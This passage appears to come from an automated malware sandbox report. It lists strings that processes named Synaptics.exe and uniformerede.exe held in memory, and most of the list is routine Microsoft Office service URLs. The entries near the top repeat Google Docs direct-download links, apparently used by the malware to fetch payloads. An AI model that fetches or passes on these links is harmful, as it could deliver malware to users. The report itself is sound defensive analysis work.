Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU#Z
Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVx
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ=
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZw
Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadana
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadblY
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbw
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddn
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeport
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadev
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgo
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.
Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoZ
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpx;overflow:hidden
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadro
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse%
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduZ
Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~x
Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
Source: RCXDA77.tmp.9.dr	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://graph.windows.net
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://graph.windows.net/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://invites.office.com/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://lifecycle.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://login.windows.local
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://management.azure.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://management.azure.com/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://messaging.engagement.office.com/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://messaging.office.com/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://ncus.contentsync.
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://officeapps.live.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://onedrive.live.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://osi.office.net
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://otelrules.azureedge.net
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://outlook.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://outlook.office.com/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://outlook.office365.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://outlook.office365.com/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
